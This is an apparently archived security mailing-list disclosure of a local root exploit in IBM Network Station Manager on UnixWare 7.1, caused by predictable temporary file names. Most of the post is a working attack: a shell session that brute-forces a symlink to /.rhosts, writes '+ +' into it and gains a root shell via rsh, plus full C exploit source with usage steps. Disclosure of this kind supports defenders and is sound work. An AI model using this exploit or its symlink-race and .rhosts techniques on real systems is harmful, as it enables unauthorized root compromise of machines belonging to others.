IBM NetStation/UnixWare local root exploit

[btellier () USA NET (Brock Tellier)]

Greetings,

OVERVIEW
A vulnerability in IBM's Network Station Manager will allow any local 
user to gain root privileges.

BACKGROUND
Though I only tested NetStation on UnixWare 7.1, I would imagine that 
this vulnerability is present on most NetStation implementations.  This daemon
is installed/running as root by default.

DETAILS

> From the help html:

  The IBM Network Station Manager is a browser-based tool
  for centrally administering IBM Network Stations and their
  users. Using the IBM Network Station Manager, the
  administrator can set IBM Network Station settings on a
  server wide basis or an individual user or workstation basis.
  Settings are specifications defining hardware (keyboards,
  mouse speeds and so on) and software as it applies to your
  session.

More or less, it's an http gui for managing your desktop configuration.

A vulnerability exists in the way NetStation creates temporary files.
Instead of using the secure-ish mktemp, NetStation merely appends the
current time in seconds to a known file name.  Normally, tmp races 
aren't a big deal for http daemons since they run as nobody or similar, but
NetStation must run as root to be able to open/modify files as a specific
user.  Thus, we can brute force a symlink from xnec.nsu.<time> 
to /.rhosts and gain root.

EXPLOIT

bash-2.02$ ls /usr/netstation/nsm/users/xnec
UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file
or directory

<now we go to http://localhost:880, login and click on>
<Hardware -> Workstation>

bash-2.02$ ls /usr/netstation/nsm/users/xnec
xnec.nsu  xnec.usr
bash-2.02$ cc -o nsmx nsmx.c
bash-2.02$ ./nsmx

<click on Workstation again>

bash-2.02$ ls -la /.rhosts
-rwx------    1 xnec     other             0 Dec 28 06:19 /.rhosts
bash-2.02$ echo "+ +" > /.rhosts
bash-2.02$ chown root /.rhosts
bash-2.02$ rsh -l root localhost sh -i
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
# 

/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
 *
 * Exploits a temporary file race condition in NetStation's HTTP interface
 *
 * To exploit: first, change the paths below to reflect your individual
 * settings/paths.  Don't worry if <username>.nsu doesn't exist, NS will
 * create it for you.  Next, point your browser at 
 * http://localhost:880 and login as a normal user.  Click on "Hardware"
 * Then "workstation".  This will create <netstationdir>/users/xnec.
 * Next, compile and run this program.  You only have thirty seconds from
 * the time you complete this step to then click on "Workstation".  When
 * this is done, you should have an /.rhosts which you own.  On some 
 * UnixWare systems, you may need to chown root /.rhosts in order to do
 * rsh -l root localhost sh -i.
 *
 * Brock Tellier btellier () usa net
 *
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>

void main() {

/* Change these paths */

char dest[20] = "/.rhosts";
char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
long sec;
int i;

sec = time(0);

for (i = 0; i < 30; i++) {
  sprintf(sourcesym, "%s%d", source, (sec + i));
  symlink(dest,sourcesym);
}

}

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1